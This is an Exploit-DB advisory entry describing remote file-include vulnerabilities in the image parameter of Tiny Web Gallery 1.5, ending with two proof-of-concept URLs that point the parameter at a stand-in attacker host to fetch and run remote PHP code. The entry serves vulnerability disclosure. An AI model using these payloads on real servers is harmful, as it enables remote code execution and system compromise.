Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Include Vulnerabilities

2006-08-10T00:00:00
ID EDB-ID:28372
Type exploitdb
Reporter x0r0n
Modified 2006-08-10T00:00:00

Description

Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Include Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/19462/info

Tiny Web Gallery is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

http://www.example.com/[path]/examples/image.php?image=http://evil_scripts http://www.example.com/[path]/examples/examples/image.php2?image=http://evil_scripts?